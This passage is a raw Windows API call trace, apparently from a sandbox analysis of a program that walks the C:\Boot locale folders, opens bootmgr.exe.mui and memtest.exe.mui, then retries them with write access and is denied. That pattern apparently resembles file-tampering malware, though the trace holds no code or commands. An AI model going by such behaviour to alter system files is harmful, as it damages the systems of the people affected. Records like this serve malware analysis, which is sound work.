0x536d0 [0069.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 30 [0069.569] CreateFileW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.672] GetFileType (hFile=0x41c) returned 0x1 [0069.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.672] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.672] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.672] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.672] CloseHandle (hObject=0x41c) returned 1 [0069.673] AreFileApisANSI () returned 1 [0069.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0069.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 30 [0069.673] CreateFileW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.673] GetLastError () returned 0x5 [0069.673] GetLastError () returned 0x5 [0069.673] SetLastError (dwErrCode=0x5) [0069.673] GetLastError () returned 0x5 [0069.673] SetLastError (dwErrCode=0x5) [0069.673] GetLastError () returned 0x5 [0069.673] SetLastError (dwErrCode=0x5) [0069.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.673] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓╠\x01⺊Ā")) returned 0 [0069.673] FindClose (in: hFindFile=0x78210 | out: hFindFile=0x78210) returned 1 [0069.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0069.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0069.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.674] AreFileApisANSI () returned 1 [0069.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fi-FI", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fi-FI", lpUsedDefaultChar=0x0) returned 14 [0069.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0069.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.674] AreFileApisANSI () returned 1 [0069.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88428 [0069.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88428, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fi-FI") returned 14 [0069.675] CreateFileW (lpFileName="C:\\Boot\\fi-FI" (normalized: "c:\\boot\\fi-fi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.675] GetLastError () returned 0x5 [0069.675] GetLastError () returned 0x5 [0069.675] SetLastError (dwErrCode=0x5) [0069.675] GetLastError () returned 0x5 [0069.675] SetLastError (dwErrCode=0x5) [0069.675] GetLastError () returned 0x5 [0069.675] SetLastError (dwErrCode=0x5) [0069.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.675] AreFileApisANSI () returned 1 [0069.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88630 [0069.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88630, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fi-FI") returned 14 [0069.675] CreateFileW (lpFileName="C:\\Boot\\fi-FI" (normalized: "c:\\boot\\fi-fi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.675] GetLastError () returned 0x5 [0069.675] GetLastError () returned 0x5 [0069.675] SetLastError (dwErrCode=0x5) [0069.675] GetLastError () returned 0x5 [0069.675] SetLastError (dwErrCode=0x5) [0069.675] GetLastError () returned 0x5 [0069.675] SetLastError (dwErrCode=0x5) [0069.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.676] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.676] FindFirstFileExW (in: lpFileName="C:\\Boot\\fi-FI\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x77fd0 [0069.676] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.676] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.677] AreFileApisANSI () returned 1 [0069.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fi-FI\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0069.678] AreFileApisANSI () returned 1 [0069.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 30 [0069.678] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.678] GetFileType (hFile=0x41c) returned 0x1 [0069.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.678] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.678] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.678] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.679] CloseHandle (hObject=0x41c) returned 1 [0069.679] AreFileApisANSI () returned 1 [0069.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0069.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 30 [0069.679] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.679] GetLastError () returned 0x5 [0069.679] GetLastError () returned 0x5 [0069.679] SetLastError (dwErrCode=0x5) [0069.679] GetLastError () returned 0x5 [0069.679] SetLastError (dwErrCode=0x5) [0069.679] GetLastError () returned 0x5 [0069.679] SetLastError (dwErrCode=0x5) [0069.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.679] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0069.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.680] AreFileApisANSI () returned 1 [0069.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fi-FI\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 